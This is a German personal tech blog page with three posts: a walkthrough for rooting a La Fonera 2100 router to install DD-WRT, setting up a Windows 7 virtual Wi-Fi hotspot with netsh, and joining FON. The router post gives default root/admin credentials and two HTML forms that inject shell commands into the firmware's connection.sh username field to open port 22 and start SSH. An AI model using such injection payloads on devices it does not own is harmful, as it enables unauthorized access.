Joerg´s IT-Tech Blog

Microsoft Technologien und über den Tellerrand hinaus, Aber vorher das TESTEN nicht vergessen!

Posts Tagged ‘WLAN’

La Fonera 2100 Router hacken – DD-WRT

Posted by JoergS - 30. Dezember 2015

Hi,

ich hatte noch einen FON La Fonera 2100 Router rumliegen, der in der Vergangenheit ein internes Gäste-WLAN (WPA2 gesichert) und ein offenes FON-Hotspot Signal ausgestrahlt hat.

Fonera2100
Wie ich erst jetzt mitbekommen habe, hat FON den Support für den 2100 und die Hotspots abgekündigt, womit der Router nicht mehr benötigt. Aufgrund der Telekom Hotspot Flatrate kann ich mich auch an den neuen „TELEKOM_FON“ Hotspots anmelden. Weiterhin sendet meine Fritz!Box7490 jetzt ein internes und ein gesichertes Gäste-WLAN aus. Daher war die 2100 frei und ich wollte den Router als Repeater einsetzen, was mit dem freien Router OS DD-WRT funktionieren sollte.

Dazu musste ich erstmal viele Informationen Sammeln, zudem gab es z.t. widersprüchliche Informationen und Anleitungen (Vorbereitungen, Reset, Downgrade und weitere Schritte NACH SSH und SSH aktivieren). Hier meine Erfahrungen:

Meine Fonera 2100 war auch dem neuesten FON-OS 0.7.1r3. Damit musste erstmal ein Reset der Fonera machen. Dazu den Router vom LAN trennen und ca. 30s den Reset Knopf am Boden des Routers drücken.

Fonera2100-reset

Danach ca. 1-2min. warten und dann per LAN direkt vom Rechner zur Fonera verbinden. Dazu muss dem Rechner eine feste IP vergeben werden:
IP: 169.254.255.2
Subnet: 255.255.0.0 (System füllt automatisch)
Default Gateway: 169.254.255.1
DNS: 169.254.255.1

Fonera2100-rechnerip169

Jetzt kann man im Browser die IP der Fonera aufrufen http://169.254.255.1 und erhält die Fonera GUI zu sehen, sowie einen Login:
Username: root
Password: admin
eingeben.

Fonera2100-gui-start071r1

Die GUI sollte als Version „0.7.1 r1“ ausgeben, somit die Vorrausetzung für den „SSH Hack“ gegeben sind.

Jetzt folgenden folgenden Code als „step1.html“ auf der Festplatte speichern:

<html>
<head>
<title>Step 1-2 to open SSH-access to La Fonera</title>
</head>
<body>
<center>
<h1>Open SSH-access to La Fonera</h1>
(Model: FON2100A/B/C & FON2200)
<h2>Works with firmware 0.7.0r4 up to 0.7.1r1</h2>
<h3>Step 1 of 2 for connection via LAN</h3>
<form method="post" action="http://169.254.255.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT)" size="60">
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='&quot;;' + this.form.wifimode.value +';&quot;'}">
</form>
</center>
</body>
</html>

Ebenso diesen Code als als „step2.html“ auf der Festplatte speichern:

<html>
<head>
<title>Step 2-2 to open SSH-access to La Fonera</title>
</head>
<body>
<center>
<h1>Open SSH-access to La Fonera</h1>
(Model: FON2100A/B/C & FON2200)
<h2>Works with firmware 0.7.0r4 up to 0.7.1r1</h2>
<h3>Step 2 of 2 for connection via LAN</h3>
<form method="post" action="http://169.254.255.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/etc/init.d/dropbear)" size="60">
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='&quot;;' + this.form.wifimode.value +';&quot;'}">
</form>
</center>
</body>
</html>

Dann im Browser die „step1.html“ suchen und ausführen (ACHTUNG: IE lokale Skripte erlauben! Firefox NoScript erlauben)

Fonera2100-ssh-step1

Danach im Browser die „step2.html“ suchen und ebenfalls ausführen

Fonera2100-ssh-step2

 

Posted in Hardware, Router | Verschlagwortet mit: , , , , , , | Leave a Comment »

Windows 7: Virtual WiFi Access Point

Posted by JoergS - 25. September 2009

Hi,

Daniel Melanchthon hat in seinem Blog einen Artikel geschrieben, wie man Windows 7 mit Virtual WiFi zum Access Point machen kann.

Die mit Windows 7 ausgelieferten WLAN-Treiber unterstützen für fast alle Karten das gehostete Netzwerk. Daniel hat es mit Karten von Atheros und Broadcom selbst getestet. Die Treiber von Intel beherrschen seiner Ausage nach, die notwendigen Erweiterungen bisher nicht. Es wird aber von Intel einen aktualisierten Treiber geben, den wir über Windows Update zur Verfügung gestellen wird.

Als nächstes öffnet man eine Eingabeaufforderung oder PowerShell als Administrator und gibt folgendes in einer Zeile ein:

netsh wlan set hostednetwork mode=allow ssid=“Virtual WiFi“ key=“mh29-dyi9-txwt“ keyUsage=persistent

Die SSID und den Key passt man natürlich an die eigenen Wünsche an. Wenn man alles richtig eingegeben hat, bekommt man als Antwort:

  1. Der Modus für das gehostete Netzwerk ist so festgelegt, dass das gehostete Netzwerk zugelassen wird.
  2. Die SSID des gehosteten Netzwerks wurde erfolgreich geändert.
  3. Die Benutzerschlüsselpassphrase des gehosteten Netzwerks wurde erfolgreich geändert.

Im Gerätemanager erscheint dann eine neue Netzwerkkarte:

Virtual-WiFi-4

Sie taucht als Drahtlosnetzwerkverbindung 2 im System auf:

Virtual-WiFi-5

Mit netsh wlan start hostednetwork startet man dann das gehostete Netzwerk. Windows 7 wird auf dem Host den neuen Adapter automatisch mit dem neuen Netzwerk verbinden…

Virtual-WiFi-7

…und den Anwender fragen, wie er das Netzwerk einstufen möchte. Ich habe im obigen Beispiel “Arbeitsplatznetzwerk” gewählt. Die Standardeinstellung lautet “Öffentliches Netzwerk”:

Virtual-WiFi-6

Informationen über den derzeitigen Status erhält man mit netsh wlan show hostednetwork:

Einstellungen für das gehostete Netzwerk
———————–
    Modus                   : Zugelassen
    SSID-Name              : „Virtual WiFi“
    Maximale Clientanzahl  : 100
    Authentifizierung         : WPA2-Personal
    Verschlüsselung                 : CCMP

Status des gehosteten Netzwerks
———————
    Status                 : Gestartet
    BSSID                  : 00:21:00:ed:cb:7b
    Funktyp             : 802.11g
    Kanal                : 1
    Anzahl Clients      : 0

Man sieht, dass das Netzwerk betriebsbereit ist und sich noch kein Client verbunden hat. Wenn man nun auf einem anderen Client das Netzwerkicon in der Taskleiste rechts unten klickt, erscheint das neue Netzwerk als ganz normales drahtloses Netzwerk und kann entsprechend verbunden werden:

Virtual-WiFi-8

Wenn man nun zum Beispiel sich in einen Hotspot eingebucht hat, kann man mit Hilfe des gehosteten Netzwerks ein zweites WLAN eröffnen, das nur für einen selbst zur Verfügung steht. Hier kann man dann weitere Laptops, Spielekonsolen, Musikplayer mit drahtlosem Internetzugang, Smartphones, etc. einbinden und die Internetverbindung über den Hotspot teilen. Mir erspart das zukünftig das Mitschleppen von einem WLAN-Router, wenn ich mal wieder unterwegs bin.

Damit Mitglieder des gehosteten Netzwerks den Internetzugang gemeinsam nutzen können, muss lediglich in den Eigenschaften der Drahtlosnetzwerkverbindung, die mit dem Hotspot verbunden ist, die gemeinsame Nutzung der Internetverbindung aktiviert und die Drahtlosnetzwerkverbindung 2 als Heimnetzwerkverbindung festgelegt werden:

Virtual-WiFi-10

Man könnte darüber natürlich auch andere Arten von Internetzugängen drahtlos teilen. Das können drahtgebundene Zugänge über ein Ethernetkabel, als auch drahtlose Zugänge über UMTS sein, wenn sich die UMTS-Karte als Wählverbindung im System einrichten lässt. Windows 7 agiert dann wie ein Gateway zwischen den Netzen. Das gehostete Netzwerk wird dabei mittels NAT gegenüber Zugriffen aus dem äußeren Netz abgeschottet. Ein DHCP-Server wird durch die Konfiguration der gemeinsamen Nutzung der Internetverbindung automatisch gestartet und vergibt an die Clients IP-Adressen aus einem vordefinierten Segment.

Zum Anhalten des gehosteten Netzwerks gibt man netsh wlan stop hostednetwork ein. Das gehostete Netzwerk wird dann beendet.

[UPDATE:] Nach Installation der neuen Intel WLAN Treiber (32-bit here, 64-bit here), können jetzt zumindest die 5300er Karten die Virtual Wifi Funktion zur Verfügung stellen, die 3945er Karten funktionieren auch damit nicht! [/UPDATE]

Na dann, Viel Spass beim selber Testen!
CU

Posted in Neuerungen, Windows 7 | Verschlagwortet mit: , , | 7 Comments »

Ich werde Fonero

Posted by JoergS - 23. Januar 2007

Hi,
 
schon lange habe ich ein Auge auf den Fon-Router geworfen, nicht dass ich noch einen WLAN-Router bräuchte, mit meinem DSL-VOIP-WLAN-Router bin ich vollends zufrieden, aber unterwegs mal einen kostenlosen WLAN-Zugang zu haben, das wäre manchmal schon praktisch. Wer bis 31.01.07 einen Fon-Router bestellt, ist Lan Fonera noch kostenlos. Für den Fon-Router werden 29 Euro berechnet.
 
Es gibt noch Aktionen von XING (ehemals OpenBC, allerdings nur bei Premium-Mitgliedschaft ) PC-Welt und Loopy den Router kostenlos zu beziehen, hier allerdings nur gegen ein Abo oder Umfragen.
 
Da ich XING-Premium-Mitglied bin habe ich mir mal einen Fon-Router schicken lassen und hoffe, dass ich bei vielen anderen "Foneros" kostenlos per WLAN surfen kann, wenn ich es mal brauche … (Durch die XING-Mitgliedschaft erhält man einen Gutscheincode, der bei Bestellung einzulösen ist.)
 

Schliessen Sie sich der FON-Bewegung an!

 
Eine gute(n) Anleitung/Erfahrungsbericht habe ich auf netzausfall.de gefunden … meinen Bericht gibt es dann hier später.
 
Bis dahin
CU

Posted in Allgemeines, community, Hardware | Verschlagwortet mit: , , | Leave a Comment »

 
%d Bloggern gefällt das: